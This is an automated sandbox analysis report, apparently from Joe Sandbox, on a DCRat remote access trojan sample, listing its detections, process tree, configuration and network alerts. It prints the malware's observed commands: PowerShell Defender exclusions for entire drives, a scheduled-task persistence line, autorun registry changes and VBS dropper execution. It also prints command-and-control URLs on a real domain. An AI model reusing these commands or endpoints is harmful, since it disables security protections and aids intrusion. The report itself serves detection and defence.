Edit tour

Windows Analysis Report
cvXu2RR10n.exe

Overview

General Information

Sample name:	cvXu2RR10n.exe renamed because original name is a hash value
Original sample name:	97a026b442f5d5739ea3d8565f3a044d.exe
Analysis ID:	1587274
MD5:	97a026b442f5d5739ea3d8565f3a044d
SHA1:	dd409fa09eede943173f5aed10542f378062dcb1
SHA256:	37afdc07792fe92b790bd6ba935889cef87b699d9f1a8f86336076f8cf6e4b72
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Drops executables to the windows directory (C:\Windows) and starts them

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

cvXu2RR10n.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\cvXu2RR10n.exe" MD5: 97A026B442F5D5739EA3D8565F3A044D)

schtasks.exe (PID: 7944 cmdline: schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 6340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7528 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7944 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8168 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ApplicationFrameHost.exe (PID: 8268 cmdline: "C:\Users\user\Music\ApplicationFrameHost.exe" MD5: 97A026B442F5D5739EA3D8565F3A044D)

wscript.exe (PID: 9528 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 9692 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

ApplicationFrameHost.exe (PID: 7980 cmdline: C:\Users\user\Music\ApplicationFrameHost.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

ApplicationFrameHost.exe (PID: 8032 cmdline: C:\Users\user\Music\ApplicationFrameHost.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

vAJjQbsDlJtvByBkfqttADkNAptf.exe (PID: 8076 cmdline: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

vAJjQbsDlJtvByBkfqttADkNAptf.exe (PID: 8096 cmdline: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

RuntimeBroker.exe (PID: 8664 cmdline: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

RuntimeBroker.exe (PID: 8748 cmdline: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

smartscreen.exe (PID: 8768 cmdline: C:\Recovery\smartscreen.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

smartscreen.exe (PID: 8796 cmdline: C:\Recovery\smartscreen.exe MD5: 97A026B442F5D5739EA3D8565F3A044D)

svchost.exe (PID: 9184 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ApplicationFrameHost.exe (PID: 9516 cmdline: "C:\Users\user\Music\ApplicationFrameHost.exe" MD5: 97A026B442F5D5739EA3D8565F3A044D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"J\":\">\",\"b\":\"(\",\"6\":\"&\",\"C\":\"~\",\"d\":\")\",\"i\":\"-\",\"Q\":\"@\",\"o\":\"<\",\"W\":\"%\",\"M\":\" \",\"A\":\".\",\"L\":\"|\",\"Z\":\"^\",\"R\":\"$\",\"y\":\";\",\"F\":\"*\",\"0\":\"_\",\"P\":\",\",\"U\":\"#\",\"Y\":\"`\",\"X\":\"!\"}", "PCRT": "{\"T\":\"~\",\"J\":\"&\",\"U\":\"!\",\"F\":\"%\",\"d\":\"@\",\"2\":\"(\",\"c\":\"-\",\"R\":\"$\",\"V\":\" \",\"y\":\";\",\"B\":\"<\",\"Q\":\"_\",\"Y\":\"`\",\"S\":\".\",\"l\":\"|\",\"G\":\"*\",\"X\":\")\",\"I\":\",\",\"q\":\">\",\"o\":\"^\",\"Z\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-gCdxOjrIZmFwPnRzH9X5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000033.00000002.2244680971.0000000003501000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000032.00000002.1437153809.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1329052019.0000000003574000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000037.00000002.2057331654.0000000002621000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000D.00000002.2197343106.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000003C.00000002.1511882111.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000036.00000002.2218726664.0000000002941000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000F.00000002.2060026074.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000012.00000002.2155072877.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000035.00000002.2324073661.00000000035A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000013.00000002.2334210958.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1329052019.0000000003331000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000D.00000002.2197343106.0000000002FED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1364796894.000000001333D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: cvXu2RR10n.exe PID: 7420	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 7980	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 8032	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8076	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: vAJjQbsDlJtvByBkfqttADkNAptf.exe PID: 8096	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 8268	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 8664	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 8748	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smartscreen.exe PID: 8768	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smartscreen.exe PID: 8796	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 9516	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.cvXu2RR10n.exe.3454e20.23.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x164ec:$s4: cHJvY2V4cA 0x16e34:$s4: cHJvY2V4cA 0x1652d:$s5: cHJvY2V4cDY0 0x16e75:$s5: cHJvY2V4cDY0 0x16429:$s12: d2lyZXNoYXJr 0x16d71:$s12: d2lyZXNoYXJr 0x162d2:$s23: ZG5zcHk 0x16c1a:$s23: ZG5zcHk 0x162db:$s25: aWxzcHk 0x16c23:$s25: aWxzcHk 0x162e4:$s26: ZG90cGVla 0x16c2c:$s26: ZG90cGVla
50.2.ApplicationFrameHost.exe.34069c8.10.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x16504:$s4: cHJvY2V4cA 0x16e4c:$s4: cHJvY2V4cA 0x16545:$s5: cHJvY2V4cDY0 0x16e8d:$s5: cHJvY2V4cDY0 0x16441:$s12: d2lyZXNoYXJr 0x16d89:$s12: d2lyZXNoYXJr 0x162ea:$s23: ZG5zcHk 0x16c32:$s23: ZG5zcHk 0x162f3:$s25: aWxzcHk 0x16c3b:$s25: aWxzcHk 0x162fc:$s26: ZG90cGVla 0x16c44:$s26: ZG90cGVla

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\cvXu2RR10n.exe, ProcessId: 7420, TargetFilename: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cvXu2RR10n.exe", ParentImage: C:\Users\user\Desktop\cvXu2RR10n.exe, ParentProcessId: 7420, ParentProcessName: cvXu2RR10n.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6340, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Music\ApplicationFrameHost.exe" , ParentImage: C:\Users\user\Music\ApplicationFrameHost.exe, ParentProcessId: 8268, ParentProcessName: ApplicationFrameHost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , ProcessId: 9528, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Music\ApplicationFrameHost.exe" , ParentImage: C:\Users\user\Music\ApplicationFrameHost.exe, ParentProcessId: 8268, ParentProcessName: ApplicationFrameHost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , ProcessId: 9528, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, CommandLine: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, NewProcessName: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, OriginalFileName: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe, ProcessId: 8664, ProcessName: RuntimeBroker.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Music\ApplicationFrameHost.exe" , ParentImage: C:\Users\user\Music\ApplicationFrameHost.exe, ParentProcessId: 8268, ParentProcessName: ApplicationFrameHost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , ProcessId: 9528, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\Music\ApplicationFrameHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\cvXu2RR10n.exe, ProcessId: 7420, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ApplicationFrameHost

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\Music\ApplicationFrameHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\cvXu2RR10n.exe, ProcessId: 7420, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Music\ApplicationFrameHost.exe" , ParentImage: C:\Users\user\Music\ApplicationFrameHost.exe, ParentProcessId: 8268, ParentProcessName: ApplicationFrameHost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs" , ProcessId: 9528, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cvXu2RR10n.exe", ParentImage: C:\Users\user\Desktop\cvXu2RR10n.exe, ParentProcessId: 7420, ParentProcessName: cvXu2RR10n.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6340, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 9184, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T02:27:23.086033+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49743	5.101.153.201	80	TCP
2025-01-10T02:27:51.177585+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49896	5.101.153.201	80	TCP
2025-01-10T02:28:03.897254+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49957	5.101.153.201	80	TCP
2025-01-10T02:28:13.109275+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49979	5.101.153.201	80	TCP
2025-01-10T02:28:21.932831+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49980	5.101.153.201	80	TCP
2025-01-10T02:28:30.996990+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49981	5.101.153.201	80	TCP
2025-01-10T02:29:04.479336+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49982	5.101.153.201	80	TCP
2025-01-10T02:29:08.966891+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49983	5.101.153.201	80	TCP
2025-01-10T02:29:38.825535+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49984	5.101.153.201	80	TCP
2025-01-10T02:29:43.276421+0100	2034194	1	A Network Trojan was detected	192.168.2.7	49985	5.101.153.201	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: cvXu2RR10n.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://arabna4a.beget.tech/L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech/L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT	Avira URL Cloud: Label: malware
Source: http://arabna4a.beget.tech	Avira URL Cloud: Label: malware
